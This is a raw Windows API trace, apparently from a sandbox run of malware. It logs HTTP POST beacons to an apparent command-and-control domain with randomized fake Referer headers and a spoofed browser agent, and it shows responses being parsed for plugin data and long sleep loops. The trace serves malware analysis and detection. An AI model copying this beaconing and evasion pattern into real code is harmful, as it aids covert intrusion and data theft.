0x83005c0 [0131.017] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x17) returned 0x83005e0 [0131.017] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2de92c57 [0131.017] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b77d557 [0131.017] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7be03966 [0131.017] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x72551091 [0131.017] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x182bed32 [0131.017] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d8161bb [0131.017] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74125ebd [0131.017] wsprintfW (in: param_1=0x83004a0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://ybaeoh.org/") returned 40 [0131.017] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83005e0) returned 0x17 [0131.017] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83005e0) returned 1 [0131.017] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83005c0) returned 0x12 [0131.017] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83005c0) returned 1 [0131.017] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300440) returned 0x4e [0131.018] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300440) returned 1 [0131.018] WinHttpAddRequestHeaders (hRequest=0x71cad70, pwszHeaders="Accept: */*\r\nReferer: http://ybaeoh.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0131.018] WinHttpSendRequest (hRequest=0x71cad70, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x8300160*, dwOptionalLength=0x118, dwTotalLength=0x118, dwContext=0x0) returned 1 [0131.294] WinHttpReceiveResponse (hRequest=0x71cad70, lpReserved=0x0) returned 1 [0131.294] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x2800) returned 0x7f12350 [0131.294] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f12350, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f12350*, lpdwNumberOfBytesRead=0x7d6f928*=0x199) returned 1 [0131.295] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f12350, Size=0x5000) returned 0x7f12350 [0131.295] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f124e9, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f124e9*, lpdwNumberOfBytesRead=0x7d6f928*=0x0) returned 1 [0131.295] VirtualAlloc (lpAddress=0x0, dwSize=0x199, flAllocationType=0x3000, flProtect=0x4) returned 0x3970000 [0131.391] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12350) returned 1 [0131.392] WinHttpCloseHandle (hInternet=0x71cad70) returned 1 [0131.392] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83004a0) returned 0x10d [0131.392] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83004a0) returned 1 [0131.392] WinHttpCloseHandle (hInternet=0x3f83fd0) returned 1 [0131.392] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83003d0) returned 0x68 [0131.393] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83003d0) returned 1 [0131.393] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83003b0) returned 0x12 [0131.393] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83003b0) returned 1 [0131.393] WinHttpCloseHandle (hInternet=0x3fb03a0) returned 1 [0131.393] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300290) returned 0x10c [0131.393] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300290) returned 1 [0131.393] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300080) returned 0xd2 [0131.394] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300080) returned 1 [0131.394] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300160) returned 0x121 [0131.394] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300160) returned 1 [0131.394] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c6ff6ba [0131.394] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x66) returned 0x8300080 [0131.394] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f466c46 [0131.394] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x44eca39 [0131.394] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48f7d86 [0131.394] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5727e518 [0131.394] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb347574 [0131.394] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f1f3739 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24d8dcfd [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x594a384e [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5a57b653 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x426d6c92 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3cfca841 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46eff08b [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x73b7f42a [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5d2cf737 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b410401 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xee288f2 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x698d1ee [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x27cc8a27 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55734e8 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47c8aa4d [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x73e4064f [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64b89b3 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3dd52085 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7604d581 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63961453 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x495eaa47 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf36397b [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c98011d [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b61d101 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14118a09 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c196a80 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x72fffa39 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2330ac21 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64509b82 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x336cdf52 [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f94915d [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x124dd28f [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x693e56d [0131.395] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5cfd70ce [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ee215f8 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x672744f4 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e4915fe [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c4f4110 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x673fec55 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5d4febb3 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5d10d4bf [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d31a373 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7807fdff [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d0c62ca [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5a3c389a [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x772e813 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16705da0 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x178e79a8 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40c2c2d8 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x380d626a [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4cd9ec61 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1623d31d [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1cc4b581 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18ad60e7 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x762e113a [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x757193e [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10426ca9 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x41bd2cec [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f721ae7 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57bfb543 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xea16da6 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x239e5214 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x502acf0d [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57fb71f0 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74d10a48 [0131.396] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e228194 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xbf8b543 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x39923804 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a0067b1 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2bd74254 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x72d69dd8 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x331a44db [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48eac812 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1fde4773 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4fc2a203 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5051fcd7 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x481b787f [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f4939f7 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x383257b2 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57015d25 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5481a30b [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c0fe75f [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1edc73df [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x225e36a2 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61e7731d [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b6ea896 [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1aaa3a8a [0131.397] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6add55d5 [0131.397] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0xb5) returned 0x83000f0 [0131.397] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0131.397] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0131.397] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0131.397] lstrcatA (in: lpString1="", lpString2="y,O%whDi(u&LkR:o50O88(R>(Bf^8pU@$]MZjho'a5M(\"PJ&M]xK%GohxH\\MmzWz\"]I<1_-jK3y\\24m4KTXl9fY0RT!K;9fYLzKA;$JCd!\"$19Ki5bZ,.wu\"@]ic'f6vdaQ?)ojH0p9xs'g90`XVc,sUFTGR-VH`[O\\.," | out: lpString1="U[em&%m&pO91Fs\\OP5rA(;B3+]k%o3eQx7tjK3y\\24m4KTXl9fY0RT!K;9fYLzKA;$JCd!\"$19Ki5bZ,.wu\"@]ic'f6vdaQ?)ojH0p9xs'g90`XVc,sUFTGR-VH`[O\\.,") returned="U[em&%m&pO91Fs\\OP5rA(;B3+]k%o3eQx7tjK3y\\24m4KTXl9fY0RT!K;9fYLzKA;$JCd!\"$19Ki5bZ,.wu\"@]ic'f6vdaQ?)ojH0p9xs'g90`XVc,sUFTGR-VH`[O\\.," [0188.796] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10c) returned 0x83002f0 [0188.796] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0188.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f12300, cbMultiByte=30, lpWideCharStr=0x83002f0, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0188.796] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x7d6f7b8 | out: pProxyConfig=0x7d6f7b8) returned 1 [0188.821] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb03a0 [0188.822] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x7d6f870 | out: lpUrlComponents=0x7d6f870) returned 1 [0188.822] WinHttpConnect (hSession=0x3fb03a0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83fd0 [0188.823] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x8300410 [0188.823] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x68) returned 0x8300430 [0188.823] WinHttpOpenRequest (hConnect=0x3f83fd0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x71c9ba0 [0188.823] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x4e) returned 0x83004a0 [0188.823] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10d) returned 0x8300500 [0188.823] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5d37a971 [0188.823] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x8300620 [0188.823] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x17) returned 0x8300640 [0188.823] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f68447f [0188.823] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57a54a65 [0188.824] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5550b57b [0188.824] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2343faca [0188.824] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x958e578 [0188.824] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55bfd9e0 [0188.824] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43f162fd [0188.824] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a4da704 [0188.824] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x186cf827 [0188.824] wsprintfW (in: param_1=0x8300500, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://cyygmofy.org/") returned 42 [0188.824] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300640) returned 0x17 [0188.824] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300640) returned 1 [0188.824] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300620) returned 0x12 [0188.824] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300620) returned 1 [0188.824] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83004a0) returned 0x4e [0188.825] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83004a0) returned 1 [0188.825] WinHttpAddRequestHeaders (hRequest=0x71c9ba0, pwszHeaders="Accept: */*\r\nReferer: http://cyygmofy.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0188.825] WinHttpSendRequest (hRequest=0x71c9ba0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x8300190*, dwOptionalLength=0x14a, dwTotalLength=0x14a, dwContext=0x0) returned 1 [0189.055] WinHttpReceiveResponse (hRequest=0x71c9ba0, lpReserved=0x0) returned 1 [0189.056] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x2800) returned 0x7f12350 [0189.056] WinHttpReadData (in: hRequest=0x71c9ba0, lpBuffer=0x7f12350, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f12350*, lpdwNumberOfBytesRead=0x7d6f928*=0x18) returned 1 [0189.058] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f12350, Size=0x5000) returned 0x7f12350 [0189.058] WinHttpReadData (in: hRequest=0x71c9ba0, lpBuffer=0x7f12368, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f12368*, lpdwNumberOfBytesRead=0x7d6f928*=0x0) returned 1 [0189.059] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x25b0000 [0189.061] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12350) returned 1 [0189.061] WinHttpCloseHandle (hInternet=0x71c9ba0) returned 1 [0189.061] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300500) returned 0x10d [0189.062] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300500) returned 1 [0189.062] WinHttpCloseHandle (hInternet=0x3f83fd0) returned 1 [0189.062] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300430) returned 0x68 [0189.062] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300430) returned 1 [0189.062] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300410) returned 0x12 [0189.063] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300410) returned 1 [0189.063] WinHttpCloseHandle (hInternet=0x3fb03a0) returned 1 [0189.063] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83002f0) returned 0x10c [0189.063] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83002f0) returned 1 [0189.063] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300080) returned 0x104 [0189.064] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300080) returned 1 [0189.064] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300190) returned 0x153 [0189.064] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300190) returned 1 [0189.064] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0189.064] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x15) returned 0x8300080 [0189.064] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0189.064] lstrlenA (lpString="plugin_size") returned 11 [0189.064] atoi (_Str="0") returned 0 [0189.064] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0189.064] lstrlenA (lpString="|:|") returned 3 [0189.064] MapViewOfFile (hFileMappingObject=0x1508, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x5f30000 [0189.076] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0189.076] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x5f30000) returned 0x0 [0189.226] atoi (_Str="0") returned 0 [0189.226] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.228] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12300) returned 0x26 [0189.228] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12300) returned 1 [0189.229] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0189.230] Sleep (dwMilliseconds=0x258) [0189.268] Sleep (dwMilliseconds=0x258) [0189.284] Sleep (dwMilliseconds=0x258) [0189.303] Sleep (dwMilliseconds=0x258) [0189.315] Sleep (dwMilliseconds=0x258) [0189.330] Sleep (dwMilliseconds=0x258) [0189.346] Sleep (dwMilliseconds=0x258) [0189.362] Sleep (dwMilliseconds=0x258) [0189.377] Sleep (dwMilliseconds=0x258) [0189.393] Sleep (dwMilliseconds=0x258) [0189.409] Sleep (dwMilliseconds=0x258) [0189.424] Sleep (dwMilliseconds=0x258) [0189.440] Sleep (dwMilliseconds=0x258) [0189.455] Sleep (dwMilliseconds=0x258) [0189.502] Sleep (dwMilliseconds=0x258) [0189.518] Sleep (dwMilliseconds=0x258) [0189.533] Sleep (dwMilliseconds=0x258) [0189.549] Sleep (dwMilliseconds=0x258) [0189.564] Sleep (dwMilliseconds=0x258) [0189.580] Sleep (dwMilliseconds=0x258) [0189.596] Sleep (dwMilliseconds=0x258) [0189.613] Sleep (dwMilliseconds=0x258) [0189.627] Sleep (dwMilliseconds=0x258) [0189.642] Sleep (dwMilliseconds=0x258) [0189.658] Sleep (dwMilliseconds=0x258) [0189.674] Sleep (dwMilliseconds=0x258) [0189.689] Sleep (dwMilliseconds=0x258) [0189.705] Sleep (dwMilliseconds=0x258) [0189.752] Sleep (dwMilliseconds=0x258) [0189.767] Sleep (dwMilliseconds=0x258) [0189.783] Sleep (dwMilliseconds=0x258) [0189.798] Sleep (dwMilliseconds=0x258) [0189.827] Sleep (dwMilliseconds=0x258) [0189.829] Sleep (dwMilliseconds=0x258) [0189.846] Sleep (dwMilliseconds=0x258) [0189.861] Sleep (dwMilliseconds=0x258) [0189.876] Sleep (dwMilliseconds=0x258) [0189.901] Sleep (dwMilliseconds=0x258) [0189.907] Sleep (dwMilliseconds=0x258) [0189.923] Sleep (dwMilliseconds=0x258) [0189.939] Sleep (dwMilliseconds=0x258) [0190.000] Sleep (dwMilliseconds=0x258) [0190.143] Sleep (dwMilliseconds=0x258) [0190.225] Sleep (dwMilliseconds=0x258) [0190.266] Sleep (dwMilliseconds=0x258) [0190.321] Sleep (dwMilliseconds=0x258) [0190.383] Sleep (dwMilliseconds=0x258) [0190.438] Sleep (dwMilliseconds=0x258) [0190.486] Sleep (dwMilliseconds=0x258) [0190.547] Sleep (dwMilliseconds=0x258) [0190.599] Sleep (dwMilliseconds=0x258) [0190.672] Sleep (dwMilliseconds=0x258) [0190.720] Sleep (dwMilliseconds=0x258) [0190.797] Sleep (dwMilliseconds=0x258) [0190.845] Sleep (dwMilliseconds=0x258) [0190.900] Sleep (dwMilliseconds=0x258) [0190.922] Sleep (dwMilliseconds=0x258) [0190.951] Sleep (dwMilliseconds=0x258) [0190.960] Sleep (dwMilliseconds=0x258) [0191.063] Sleep (dwMilliseconds=0x258) [0191.115] Sleep (dwMilliseconds=0x258) [0191.173] Sleep (dwMilliseconds=0x258) [0191.194] Sleep (dwMilliseconds=0x258) [0191.218] Sleep (dwMilliseconds=0x258) [0191.312] Sleep (dwMilliseconds=0x258) [0191.407] Sleep (dwMilliseconds=0x258) [0191.461] Sleep (dwMilliseconds=0x258) [0191.481] Sleep (dwMilliseconds=0x258) [0191.486] Sleep (dwMilliseconds=0x258) [0192.072] Sleep (dwMilliseconds=0x258) [0192.077] Sleep (dwMilliseconds=0x258) [0192.092] Sleep (dwMilliseconds=0x258) [0192.154] Sleep (dwMilliseconds=0x258) [0192.220] Sleep (dwMilliseconds=0x258) [0192.267] Sleep (dwMilliseconds=0x258) [0192.290] Sleep (dwMilliseconds=0x258) [0192.295] Sleep (dwMilliseconds=0x258) [0192.342] Sleep (dwMilliseconds=0x258) [0192.435] Sleep (dwMilliseconds=0x258) 